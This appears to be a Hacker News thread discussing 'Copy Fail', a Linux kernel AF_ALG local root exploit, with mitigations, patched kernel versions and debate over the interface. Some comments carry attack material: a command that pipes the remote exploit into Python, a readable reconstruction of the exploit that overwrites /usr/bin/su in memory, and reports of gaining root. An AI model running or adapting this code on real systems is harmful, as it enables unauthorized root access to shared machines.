Copy Fail

17 hours ago (copy.fail)

As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).

The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.

If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.

I don't think there's much other option. This sort of userspace API might have been sort of okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.

  • As I did not know what AF_ALG is in the first place I've searched for it and found this here:

    https://www.chronox.de/libkcapi/html/ch01s02.html

    It states the following:

    > There are several reasons for AF_ALG:

    > * The first and most important item is the access to hardware accelerators and hardware devices whose technical interface can only be accessed from the kernel mode / supervisor state of the processor. Such support cannot be used from user space except through AF_ALG.

    > * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information from its memory and just use the cipher handle to perform the cryptographic operations. If the application is cracked an attacker cannot obtain the key material.

    > * On memory constrained systems like embedded systems, the additional memory footprint of a user space cryptographic library may be too much. As the kernel requires the kernel crypto API to be present, reusing existing code should reduce the memory footprint.

    I can't judge whether this is a good justification, but there is one.

    • AF_ALG if I remember correctly predates userspace-accessible crypto acceleration and was way more important back when it meant you had actual need for "SSL accelerator" cards in servers, among other things

    • Hi, embedded firmware engineer here. I give it a B-

      There's a weird area between the workloads that fit on a microcontroller, and the stuff that demands a full-blown CPU. Think softcore processors on FPGAs, super tiny MIPS and RISC-V cores on an ASIC, etc. Typically you run something like Yocto on a core like that. Maybe MontaVista or QNX if you've got the right nerd running the show.

      So you have serious compute needs, and security concerns that justify virtual memory. But you don't have infinite space to work with, so hardware acceleration is important. Having a standard API built into the kernel seems like a decent idea I guess.

      And yet, I've never heard of AF_ALG. I've never seen it used. The thing is, if you have some bizzaro softcore, there's a good chance you also have a bizzaro crypto engine with no upstream kernel driver. If you're going to the trouble of rolling your own kernel with drivers for special crypto engines, why would you bother hooking it into this thing? Roll your own API that fits your needs and doesn't have a gigantic attack surface.

  • Please don't rely on my judgement for this being safe for production, but after blacklisting the modules, the provided python exploit failed.

    Check if the following are modules

      grep CONFIG_CRYPTO_USER_API /boot/config-$(uname -r)
    

    If they are, you can try blacklisting them

      /etc/modprobe.d/blacklist-crypto-user-api.conf
      
      """
      blacklist af_alg
      blacklist algif_hash
      blacklist algif_skcipher
      blacklist algif_rng
      blacklist algif_aead
    
      install af_alg /bin/false
      install algif_hash /bin/false
      install algif_skcipher /bin/false
      install algif_rng /bin/false
      install algif_aead /bin/false
      """
    
      update-initramfs -u
    

    Can anyone comment on the ramifications this?

    • If iwd, or cryptsetup with certain non-default algorithms, isn't being used on the system, you should be fine. Not many programs use AF_ALG. It's possible there are others I'm not aware of, but it's quite rare.

      To be clear, general-purpose Linux distros generally can't disable these kconfig options yet, due to these cases. But there are many Linux systems that simply don't need this functionality.

      A good project for someone to work on would be to fix iwd and cryptsetup to always use userspace crypto, as they should.

      2 replies →

    • I can’t comment on the ramifications, except to note that elsewhere in the thread this appears to not break anything (whether it makes userspace crypto a little less safe is academic, but that doesn’t matter if we have an easy local root shell), but I can verify the above fix does protect Ubuntu 24.04 from the exploit.

      Just reboot after applying this change.

  • For anyone wondering: AF_ALG is a Linux socket interface that exposes the kernel’s crypto API via file descriptors, using normal read(2)/write(2) calls for hashing and encryption.

  • I was completely unaware of https://syzbot.org, thanks for sharing!

    > syzbot system continuously fuzzes main Linux kernel branches and automatically reports found bugs to kernel mailing lists. syzbot dashboard shows current statuses of bugs. All syzbot-reported bugs are also CCed to syzkaller-bugs mailing list. Direct all questions to syzkaller@googlegroups.com.

  • The primary benefit of AF_ALG is IMHO when it's combined with kernel keyrings, i.e. ALG_SET_KEY_BY_KEY_SERIAL.

    To steal from the sibling post:

    > * When using user space libraries, all key material and other cryptographic sensitive parameters remains in the calling application's memory even when the application supplied the information to the library. When using AF_ALG, the key material and other sensitive parameters are handed to the kernel. The calling application now can reliably erase that information [...]

    It's even more than this: you can do crypto ops in user space without ever even having the key to begin with.

    [Ed.: that said, maybe AF_ALG should be locked behind some CAP_*]

    [Ed.#2: that said^2, I'm putting this one on authencesn, not AF_ALG. It's the extended sequence number juggling that went poorly, not AF_ALG at large. I bet this might even blow up in some strange hardware scenarios, "network packet on PCIe memory" or something like that - I'm speculating, though.]

    • It doesn't seem to actually get used that way in practice. ALG_SET_KEY_BY_KEY_SERIAL didn't even appear until just a few years ago. And either way, if the interface allows you to overwrite the su binary, whether it theoretically could provide some other security benefit becomes kind of irrelevant.

      1 reply →

  • It does enable address space separation of secret keys from user space, which some people love:

    https://blog.cloudflare.com/the-linux-kernel-key-retention-s...

    https://www.youtube.com/watch?v=7djRRjxaCKk

    https://www.youtube.com/watch?v=lvZaDE578yc

    So it's not as simple as "should not exist". I agree though that there doesn't seem to be a valid need to expose authencesn to user space.

    Disclosure: I'm co-maintaining crypto/asymmetric_keys/ in the kernel and the author/presenter in the first two links is another co-maintainer.

    • That can be done in userspace too -- different userspace processes have different address spaces too.

      The fact that the first link recommends using keyctl() for RSA private keys is also "interesting", given that the kernel's implementation of RSA isn't hardened against timing attacks (but userspace implementations of RSA typically are).

      2 replies →

    • can you please give me a real-life example of an application, on a typical linux laptop or typical linux server, which userspace application would use this CRYPTO_USER_API ? None that I looked at seem to use it: openssl, pgp, sha256sum

      2 replies →

  • Why is this available in the kernel on a box that does not use ipsec? should this be compile time enabled module instead than a generic solution?

    • The design philosophy of mainstream Linux distros is not like OpenBSD.

      Linux distros go to market as maximally capable, maximally interoperable, and maximally available for whatever the users want to do. So there is a lot of "shovelware" that is unnecessarily installed with your base system. A lot of services are enabled that you don't need. A lot of kernel modules are loaded or ready to spring into action as soon as you connect hardware that the kernel recognizes.

      All this maximizing also increases the system's attack surface, whether local or over the network. Your resources, time and effort increase, to update the system and maintain all those packages. The TCO is high.

      With OpenBSD, the base system is hardened and the code is audited with security in mind. They only install or enable essential functions. So it's up to the user to dig in, customize it, and add in features that are needed.

      The good news is that you can do some after-market hardening. Uninstall software that you're not using, and disable non-essential services. Tune your kernel for special-purpose, or general-purpose, but not every-purpose.

      There are now special distros for containers and VMs with minimal system builds. They are designed to be as small and lightweight as possible. That is a good start in the right direction.

  • I think it would be reasonable to deprecate af_alg in favor of a character device. It's more accessible that way. The downside is that the maintainers hate adding new ioctls. I think that's fair. But I don't think a "regular" device node would cover the functionality userland expects.

    That said, elsewhere ITT it's pointed out there are only a few use cases so far.

  • Many things, such as ksmbd seems ill-advised when looked at from security. New AI driven exploits era will likely make projects more wary to adding functions.

  • can you please give me a real-life example of an application, on a typical linux laptop or typical linux server, which userspace application would use this CRYPTO_USER_API ? None that I looked at seem to use it: openssl, pgp, sha256sum

  • How did it get in? Isn’t Linus known for being rightfully fussy about what makes it into the kernel?

    Would be an interesting story.

    • Linus has had been fussy about maybe like 5% of the things because even then he couldn't keep up with the sheer volume. Nowadays it's more like 1‰

  • any idea what software this will break once I turn this kernel configuration off?

    • iwd is the main culprit (for systems that use it instead of wpa_supplicant).

      I think cryptsetup / LUKS also requires it with some non-default options. With the default options, it works fine with the kconfigs disabled.

      There's not much else, as far as I know. Normally programs just use a userspace library instead, such as OpenSSL.

It seems there was some kind of confusion during the disclosure process, because the vendors aren't treating this vulnerability as serious and it remains unpatched in many distros.

https://access.redhat.com/security/cve/cve-2026-31431 "Moderate severity", "Fix deferred"

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

  • Seems like distros consider it a medium risk because it doesn't involve remote code execution and requires local access. Though it allows local root privilege escalation which is considered high priority.

    https://ubuntu.com/security/cves/about#priority

    > Medium: A significant problem, typically exploitable for many users. Includes network daemon denial of service, cross-site scripting, and gaining user privileges.

    • Strange that it's not classified as "high", which specifically includes "local root privilege escalations".

      > High: A significant problem, typically exploitable for nearly all users in a default installation of Ubuntu. Includes serious remote denial of service, local root privilege escalations, local data theft, and data loss.

      1 reply →

    • if your model is that linux is just about single-user desktops, this local exploit isn't too bad. or if your model is nothing but DB servers or the like.

      mystifying to me that shared, multi-user machines are not thought of. for instance, I administer a system with 27k users - people who can login. even if only 1/10,000 of them are curious/malicious/compromised, we (Canadian national research HPC systems) are at risk. yes, this is somewhat uncommon these days, when shell access is not the norm.

      but consider the very common sort of shared hosting environment: they typically provide something like plesk to interface to shared machines with no particular isolation. can you (as a website owner or 0wner) convince wordpress/etc to drop and execute a script? yep.

      5 replies →

    • Local access is a bit of a misnomer though, a vulnerable website can be tricked into running a script

    • it's not like this couldn't be chained with some other exploit to get remote access to get remote root access which seems like a bit of an issue

  • It was already known to attackers (or basically anyone watching) weeks ago when the patch hit the kernel but it wasn't communicated by upstream as a vuln (because Linus and Greg do not believe that vulnerabilities are conceptually relevant to the kernel).

  • I thought that. surely people are going crazy right now owning anything with an our of date Wordpress exposed.

It's unfortunate that this does not include which versions of the kernel are vulnerable/patched, especially since this is a builtin module which cannot be easily removed with rmmod...

I was wondering if I was vulnerable running Fedora 44, kernel 6.19.14, and after a few minutes of digging I was able to find the linux-cve-announce mailing list post: https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20... which says:

  ...fixed in 6.18.22 with commit fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8

  ...fixed in 6.19.12 with commit ce42ee423e58dffa5ec03524054c9d8bfd4f6237

  ...fixed in 7.0 with commit a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

Hope that helps.

  • most distros backport fixes which does not increment that version number. i.e. they patch it, they do not ship a completely new kernel release.

If you want to use the suggested mitigation (disabling kernel module `algif_aead` with a modprobe config), and you do not want to run that whole obfuscated shell code to get an actual root shell, but only check if the module can be loaded, here is a readable version of its first few lines:

    python3 -c 'import socket; s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind(("aead","authencesn(hmac(sha256),cbc(aes))")); print("algif_aead probably successfully loaded, mitigation not effective; remove again with: rmmod algif_aead")'

Similarly, when the mitigation is in place,

    modprobe algif_aead

should fail with an error.

  •     modprobe algif_aead
        modprobe: FATAL: Module algif_aead not found in directory /lib/modules/6.14.3-x86_64-linode168
    

    Yet this kernel is vulnerable.

    • That would suggest that CRYPTO_USER_API_AEAD=y in your kernel config. You can disable it in that case by setting that to "n", recompiling your kernel, and putting the new kernel in place.

This submission is currently the main HN submission.

As of now the submission title is simply “Copy Fail”.

Given the severity of the exploit, can we edit the Title to add some context that it’s a major Linux vulnerability?

Eg the other submissions say this : “Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.”

  • I dont really get why you'd

    - buy a domain

    - vibe code a page/artifact/whatever (which, given the quality of LLM wordings, only makes an argument less strong)

    - post it on HN with no further explanation in the title

    Why not write a detailed report? Even a tweet makes much more sense in my head than this. Even a logo??

    Sorry if this comes over as salty, I guess I'm just not getting the thought process.

    • I think they’re using it to promote their product, Xint Code, which was used to discover it. That’s the way I read it anyway.

    • Definitely comes over as salty. Naming major flaws has been a tradition for decades. Remember Heartbleed? It had a site and a logo :) Shellshock, Meltdown, Spectre as well. A few more: https://github.com/hannob/vulns

      This site though is pretty useful; first it serves as a central location to point people to with short links in chats/emails/whatever, then it has a quick visual explainer and a link to the detailed technical report for those who want more info. Pretty neat.

      Last but not least, buying the domain must have taken 5 minutes, prompting the page must have taken 30 minutes and posting it on HN must have taken 1 minute. So it certainly wasn't a lot of work in the grand scheme of things and probably did not deter the team from doing other important things.

LPE = local privilege escalation

Too many darn acronyms. This one wasn't too hard to figure out from context but I wish people would define acronyms before using them!

  • LPE is a very well-known acronym within the security community, it's not purely academic or obscure or anything.

    I agree that it would be a good idea to define it explicitly when writing for a broader audience, but I don't think it's particularly egregious that they didn't. It's certainly something I could see myself forgetting.

    Then again, the whole writeup appears to be AI-generated, so...

    • Sure, but the target audience of copy.fail is surely not the security community but regular sysadmins who probably don't otherwise follow as closely.

  • To be fair, I just consulted 3 cybersecurity glossaries (SANS.org, NIST CSRC, Huntress), and none of them list "LPE" nor "Local Privilege Escalation".

    If you type "LPE" into English Wikipedia's search bar, and press "Enter", you'll be sent to a disambiguation page which contains a link to the relevant article.

    https://en.wikipedia.org/wiki/LPE

  • I don't know why, but newer writers have never been taught to expand their acronyms on first use. I blame the US education system.

Good thing nobody is silly enough to let fully autonomous AI agents run as regular users on these affected operating systems. That could be disastrous given a zero day prompt injection technique.

That is why we should get rid of setuid binaries. GrapheneOS does not use them and was therefore not affected. On the desktop there is also a project called Secureblue based on Fedora Atomic that is moving in a similar direction and has already eliminated a large number though not all setuid binaries. As an alternative to sudo, su, and pkexec there is for example run0, which is available in distributions using systemd. Since systemd 259 there is now also the --empower parameter which like sudo elevates the privileges of the regular user. Essentially any distribution could start removing sudo and create an alias so that users don’t have to adjust immediately.

I wasn't able to unload algif_aead on RHEL 9/10 because it's built in, rather than a module.

So here the next-best thing I found: Disable AF_ALG via systemd. Needs drop-ins for all exposed services. Here an Ansible playbook that covers ssdh and user@, which are the main ones usually.

https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464d...

  • How about blacklisting algif_aead initialization function on RHEL 9/10? I added "initcall_blacklist=algif_aead_init" to the kernel boot options and rebooted. The exploit is not working anymore.

    • Good idea. Added to the playbook for RHEL only.

      On Debian normal unloading of the module works.

  • FYI RHEL's SELinux policy blocks AF_ALG socket creation for confined services out of the box. But disabling via RestrictAddressFamilies= unit option, or initcall_blacklist= kernel parameter, seems to be a good mitigation for unconfined services, users and containers.

The page itself seems vibecoded and a bit of an advertisement, but it does look like the vulnerability is real and high risk. It does explain the big security update I just got, guess I'll prioritize updating today.

  • This is pretty obviously an advertisement but it's a pretty good advertisement imo, it pairs a meaningful contribution to the OSS ecosystem (discovering and patching a real bug) with selling your cybersecurity tool at the same time.

  • These guys don't need to advertise, they are already 100% busy with work. But who wastes their time manually creating web pages? Especially kernel devs.

    • Side comment: I have recently used Claude Code to make a few sites for testing purposes. In the prompt I added "don't make it look vibe coded," and it worked pretty well: No purple gradients, bento box layouts, etc. Nothing spectacularly original, either, but probably enough to avoid accusations of vibe coding.

For mitigation, the page currently basically just says:

> Update your distribution's kernel package to one that includes mainline commit a664bf3d603d

But it isn't very clear to me what Kernel version you can expect that to be in. For Arch/CachyOS, the patch seems to be included in 6.18.22+, 6.19.12+ and 7.0+. If you're on any of the lower versions in the same upstream stable series, you're likely vulnerable right now. Some distro kernels may include the fix in other versions, so check for your distribution.

So this replaces a SUID binary, in order to run as PID 0. The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container (or specifically, a user namespace).

I ran the exploit in rootless Podman, and predictably it doesn't escape the container.

They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

  • >The website claims it can escape "Kubernetes / container clusters" and "CI runners & build farms" but I don't see anything supporting the claim it can escape a container

    they state that the write-up is forthcoming. presumably there is some additional steps or modifications that will be detailed in the 'part 2'.

    "Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform."

  • It overwrites bytes in memory of any file you can read. It's not hard to imagine how it could escape a lot of things.

  • > They also claim their script "roots every Linux distribution shipped since 2017.", but only tested four; and it doesn't work on Alpine

    They've done themselves no favours at all with their write up.

    It does seem legitimate (I was able to use the PoC on a 24.04 instance), and seems like it should be a big deal, but the actual number of affected distributions seems way lower, and not even remotely as per their claim every distribution since 2017.

    For example with Ubuntu, if I'm reading it right there's some impact in 16.04 (EOL), but then at least as per their analysis, only the vendor specific 6.17 kernels they ship that have it (e.g. linux-gcp, linux-oracle-6.7 etc.). That's a relatively new kernel version they started shipping recently, after it was released upstream last September.

  • If you can get to real UID 0 from a rootless container, you can escape it, but you do need to take extra steps. Same with it working on Alpine: the underlying vulnerability probably still exists, but the script might need some adjusting. It's a PoC, not a full exploit for every situation.

    • It's worth pointing out that you cannot, definitionally, get "real UID 0" in a "rootless" container, because then it wouldn't be a rootless container. This is relevant because this exploit doesn't claim to be able to bypass user namespaces, and that getting "real UID 0" would be a different exploit.

  • Kubernetes 1.33 switches to user namespaces enabled by default, which I imagine is the same underlying mechanism that rootless Podman uses. `hostUsers: false` is the way to ensure that root in the pod is root on the host. It's trivial for a real (unmapped) root to escape a Kubernetes pod.

  • Their PoC does as you say, but is built upon arbitrary modification of the page cache, which could be abused for the other things

  • It also doesn't work on Raspberry Pi, though presumably it could easily be made to; it does replace the su binary, but the replacement is not executable.

    • It's patching the binary in memory, so the binary patch would be architecture dependent. The existing one is only x86_64, but with an updated payload, it would work on arm.

    • this is because the `su` binary is replaced with x86 shellcode, replace it with aarch64 and it will work just the same.

  • Did you try it on systems that don't have the patch already? Seems many distributions already shipped kernels with the patch ~a month ago.

    • Yes. Alpine in rootless Podman doesn't work (after replacing "/usr/bin/su" with "/bin/su" in the .py, running the .py just doesn't do anything) while it does in Debian in rootless Podman on the same host.

As soon as I read this

>Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. any user becomes root

jumped out of bed and went straight into webminal.org servers as local user and ran the python code. It says permission denied on sock() call.

Then I tested with local laptop with it:

```

$ uname -a

Linux debian 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64 GNU/Linux

$ python3 copy_fail_exp.py

# cd /root && ls

bluetooth_fix_log.txt dead.letter overcommit_memorx~ overcommit_memory~ overcommit_memorz~ resize.txt snap

```

It does provide the root access!

  • I also tested this on an Ubuntu 24.04 (x86_64) host w/ GA kernel ("6.8.0-103-generic #103-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 10 13:34:59 UTC 2026 x86_64 GNU/Linux") and wasn't able to reproduce the "problem", although `canonical-livepatch` tells me that there are currently "no livepatches available".

Is there a readable version of the exploit readily available by any chance? Gotta admit that I failed binary-zip-interpretation-with-naked-eye class twice

I couldn't get the POC to work with my version of Python so I had ChatGPT convert it to C [0] and was able to verify my Slackware system does not appear to be affected, but my NixOS system would be if I had any world-readable suid binaries (which I had to make one to test it).

[0] https://rkeene.org/viewer/tmp/copy_fail_exp.c.htm

  • Don't you have like, a sudo in /run/wrappers/bin?

    EDIT: Sorry, I failed at reading your message. Never mind.

This looks like an extraordinary find at first glance.

Does this mean you can go from a basic web shell from a shared hosting account to root? I can see how that could wreak havoc really quickly.

Interestingly it fails for me because my `su` isn't world-readable:

  $ stat /bin/su
    File: /bin/su
    Size: 59552           Blocks: 118        IO Block: 59904  regular file
  Device: 0,52    Inode: 796854      Links: 1
  Access: (4711/-rws--x--x)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2023-09-18 13:23:03.117105665 -0500
  Modify: 2021-02-13 05:15:56.000000000 -0600
  Change: 2023-09-18 13:23:03.119105665 -0500
   Birth: 2023-09-18 13:23:03.117105665 -0500

I'm not sure I have any setuid/setgid binaries that are world-readable...

  • A workaround might be to make all setuid/setgid files non-world-readable because then they cannot be opened at all, and thus there is no setuid file to replace the contents of.

    • Eh, if you can pollute page caches this won’t safe you.

      Think modifying shared libraries, ld preload, cron, I guess on some systems /etc/passwd even.

      There are a lot of files readable that should definitely not be writable.

      1 reply →

  • It being readable is the default configuration most places, after all the purpose is to call it from a non-privileged user. But I could see it being made non-readable since its use is discouraged nowadays... though then I'd expect sudo to be readable as an alternative.

    • My `sudo` is also not readable. Files/directories don't need to be readable to be executed. I can still use `su` and `sudo`.

This is amazing. Page says it works on RHEL 14.3, which doesn’t exist. Current RHEL is 10.x, this must’ve been done in a TARDIS.

If this is verified, this is a very big deal. Root access on any shared computer. Additionally do we know what kernel versions and stable versions have the patch?

    curl https://copy.fail/exp | python3 && su
    Traceback (most recent call last):
      File "<stdin>", line 9, in <module>
      File "<stdin>", line 5, in c
    AttributeError: module 'os' has no attribute 'splice'

Does this mean I'm not affected or it's a buggy script?

Edit: python3 is python 3.6 on my system. Runnung with python3.10 instantly roots. Crazy find!

Could this be used to root Android devices? Does Android ship with algif_aead?

  • I rewrote it quickly to C [1] (and changed the embedded binary to be aarch64).

    Unfortunately it fails on calling bind() on my device, so probalby Android doesn't ship with that kenrel module by default :(. So no freedom for my $40 phone.

    Putting it out here, maybe somebody else will have better luck.

    [1] https://gist.github.com/alufers/921cd6c4b606c5014d6cc61eefb0...

    • Update: Checking the kernel config indeed confirms this.

         adb shell zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
         # CONFIG_CRYPTO_USER_API_HASH is not set
         # CONFIG_CRYPTO_USER_API_SKCIPHER is not set
         # CONFIG_CRYPTO_USER_API_RNG is not set
         # CONFIG_CRYPTO_USER_API_AEAD is not set

  • There’s SELinux, everything is mounted nosuid, barely anything runs as root except init. I doubt it.

    • You don't need a suit binary for this, they have arbitrary write of memory. The suid binary is just a convenient and portable way to demonstrate it. Real exploits will use many different mechanisms.

  • I’ve poked around on my phone and it didn’t work:

        File "/data/data/com.termux/files/home/a.py", line 5, in c
          a=s.socket(38,5,0); # ...
        File "/data/data/com.termux/files/usr/lib/python3.13/socket.py", line 233, in __init__
          _socket.socket.__init__(self, family, type, proto, fileno)
          ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      PermissionError: [Errno 13] Permission denied

    • I got line 5 to run and failed on line 8 due to lack of su. I'd need to find a user accessible setuid binary for it to work.

      Traceback (most recent call last): File "/data/data/com.termux/files/home/exploit.py", line 8, in <module> f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) ^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

      5 replies →

  • Android is smarter than setuid + system partitions aren't writable.

    • System partitions being non-writable has nothing to do with the vulnerability - it allows modifying the cache of any file that you can open for reading.

      Not using setuid anywhere means you'd have to build a slightly more clever exploit, but it's still trivial - just modify some binary you know will run as root "soon".

      But... I didn't check, but IIRC the untrusted_app secontext that apps run in is not allowed to open AF_ALG sockets - so you can't directly trigger the vulnerability as a malicious app. Although it might be possible in some roundabout way (requesting some more privileged crypto service to do so).

      2 replies →

    • Its not writing to the partition though is it? It is polluting the cache page via a write with a buffer overrun in the kernel. I don't think buffer overruns follow permissions.

      1 reply →

Tried this on my arch VPS which has a few users that hasn't been rebooted for 122 days.

Got:

    OSError: [Errno 97] Address family not supported by protocol

I guess AF_ALG is not part of the Arch Linux LTS kernel?

Edit:

Looks like on Arch you have to go out of your way to have this enabled.

    $ zcat /proc/config.gz | grep CONFIG_CRYPTO_USER_API
    CONFIG_CRYPTO_USER_API=m
    CONFIG_CRYPTO_USER_API_HASH=m
    CONFIG_CRYPTO_USER_API_SKCIPHER=m
    CONFIG_CRYPTO_USER_API_RNG=m
    # CONFIG_CRYPTO_USER_API_RNG_CAVP is not set
    CONFIG_CRYPTO_USER_API_AEAD=m
    # CONFIG_CRYPTO_USER_API_ENABLE_OBSOLETE is not set
    $ uname -r
    6.12.63-1-lts

  • On my Arch boxes the official exploit works, both with the LTS kernel (6.18.21-1-lts) and the mainline release (6.19.6-arch1-1).

    • Yeah I think maybe it loads the module on demand. The problem is I've upgraded my kernel many times in the last 122 days which wipes out the running or last installed kernel modules directory. I'm guessing if I had my running kernel modules directory it would on demand load and I'd get root.

The fetishism of "byte count" (here, as "732 byte python script") needs to stop, especially when in a context like this where they're trying to illustrate a real failure modality.

Looking at their source code [1] it starts with this simple line:

import os as g,zlib,socket as s

And already I'm perplexed. "os as g"? but we're not aliasing "zlib as z"? Clearly this is auto-generated by some kind of minimizer? Likely because zlib is called only once, and os multiple times. As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

Anyway, I could go on. :) Let's just stop fetishizing byte count

[1] https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

  • Hilariously, "os as g" adds one more byte than it saves, since os is only used 4 times but the alias takes 5 extra bytes to save 4. And "socket as s" comes out even.

    If you wanted real savings, you'd use "d=bytes.fromhex" instead of defining a function -- 17 bytes!! And d('00') -> b'\0' for -2 bytes.

    We could easily get the byte count down further by using base64.b85decode instead of bytes.fromhex (-70 or so), but ultimately we're optimizing a meaningless metric, as you mention.

  • I don't see it as fetishizing byte count. I think of it as a proxy measure for how complicated or uncomplicated the exploit might be. They could just as well have said "we can do it in 3 lines of python" or "the Shannon entropy of the script implementing the exploit is really small" and I would have interpreted it similarly.

    Where do you see this "fetishizing" happening most often? It's a strange thing to counter-fetishize about.

    • > I think of it as a proxy measure for how complicated or uncomplicated the exploit might be.

      From a Busy Beaver, 256-bytes compo, or Dwitter perspective, 732 bytes isn’t really that meaningful.

      And the sample exploit is even optimizing the byte size by using zlib compression, which doesn’t make much sense for the purpose. It just emphasizes the byte count fetishization.

      3 replies →

  • I don't get the 732-byte thing either and while I think it's a relatively punchy and unusually informative landing page for named vulnerability there are little snags like this all over it.

    But the fact that it's not a kernel-exec LPE and it's reliable across kernels and distributions is important; it's close to the maximum "exploitability" you're going to see with an LPE. Which the page does communicate effectively; it just gilds the lily.

    • yeah... definitely a bit of a rush to get the landing page out after a long time in the disclosure process. The folks putting this all together have been working like mad (finding the bug, disclosing, working a lot on patching, writing up POCs and verifying exploitability in different scenarios) and stayed up really late to finish up the landing page, which led to a lot of minor issues.

      But the bug is real and people should patch :)

      For the size: sometimes people will shove in kilobytes of offset tables or something into an exploit, so it'll fingerprint and then look up details to work. This is much smaller because it doesn't need any of that, which is important for severity. (I agree the "golf" nature is a bit of an aside, kind of like pwn2own exploits taking "10 seconds")

  • Glad I’m not alone. The whiplash from “oh, python I can read this” to “what the hell does that do” was jarring.

    Assuming AI was correct, it unpacks more or less like this

    import os, zlib, socket

    AF_ALG = 38

    SOCK_SEQPACKET = 5

    SOL_ALG = 279

    def hex_bytes(x):

        return bytes.fromhex(x)
    

    def trigger(fd, offset, patch4):

        sock = socket.socket(AF_ALG, SOCK_SEQPACKET, 0)
    
        sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    
        sock.setsockopt(SOL_ALG, 1, hex_bytes("0800010000000010" + "0" * 64))
    
        sock.setsockopt(SOL_ALG, 5, None, 4)
    
        op, _ = sock.accept()
    
        length = offset + 4
    
        zero = b"\x00"
    
        op.sendmsg(
    
            [b"A" * 4 + patch4],
    
            [
    
                (SOL_ALG, 3, zero * 4),
    
                (SOL_ALG, 2, b"\x10" + zero * 19),
    
                (SOL_ALG, 4, b"\x08" + zero * 3),
    
            ],
    
            32768,
    
        )
    
        read_pipe, write_pipe = os.pipe()
    
        os.splice(fd, write_pipe, length, offset_src=0)
    
        os.splice(read_pipe, op.fileno(), length)
    
        try:
    
            op.recv(8 + offset)
    
        except:
    
            pass
    

    target = os.open("/usr/bin/su", os.O_RDONLY)

    payload = zlib.decompress(bytes.fromhex("..."))

    offset = 0

    while offset < len(payload):

        trigger(target, offset, payload[offset:offset + 4])
    
        offset += 4
    

    os.system("su")

  • I started to take the exploit script apart and reformat it to be something readable. At about 1041 bytes it's actually readable. The heart of it also includes an encoded zlib compressed blob that's 180 bytes long ('78daab77...'). This is decompressed (zlib.decompress(d(BLOB)) to a 160 byte ELF header.

  • > I would absolutely never approve review of any code that used this.

    How often do you review, and subsequently block the release, of PoCs in this sort of context? Sounds like you've faced this a lot.

    I always thought code quality mattered less in those, as long as you communicate the intent.

    • If you have a choice between posting minimized exploit code, and posting regular exploit code, posting minimized code is virtually always the wrong choice.

      If you have a choice between pointing out the byte size of the exploit, and not pointing out the byte size of the exploit, pointing it out is virtually always the wrong choice.

      In both cases, doing the right thing is less work. So somebody is going the extra way to ensure they are doing it wrong. If they didn't care, they'd end up doing it right by default.

    • > as long as you communicate the intent

      How does "import os as g" communicate the intent? How does hiding the payload behind zlib communicate the intent? This is the opposite: obfuscating the intent, so they can brag about 732 bytes instead of 846 bytes (or whatever it might have been).

      It would have been less work for everyone involved to just release the unminified source.

    • While not formally reviewing code like this, I read a lot of it for fun. When it's clear and understandable, it's more educational and enjoyable. If the PoC code can also serve as a means of communication, that seems like an extra win.

  • While I agree that it doesn't make much sense to use a minimizer on code the reader could understand, the code-golfed byte count of a CVE repro communicates its complexity in a certain visceral way.

  • It's just lazy AI* writing w/0 editing.

    "Just" is doing a lot of work there, I'm so annoyed reading it.

    It's like an anti-ad and they had pretty cool material to work with.

    * Claude loves stacatto "Some numeric figure. Something else. Intensifier" (ex. the "exploitable for a decade." or whatever sentences)

  • > Anyway, I could go on.

    Then go on. zlib is only used once, so "zlib as z" in exchange for using z once doesn't get you anything. Using os directly and not renaming it g saves you 2 bytes though. But in this age where AI outputs reams of code at the drop of a hat, why shouldn't we enjoy how small you can get it to pop a root shell?

    https://gist.github.com/fragmede/4fb38fb822359b8f5914127c2fe...

    edit: If we drop offset_src=0 and just pass in 0 positionally, it comes down to 720.

    • >...why shouldn't we enjoy how small you can get it to pop a root shell?

      Because I want to know what the exploit is doing and how it works, and if it's even safe to run.

      A privesc PoC is NOT the place for this kind of fun.

      1 reply →

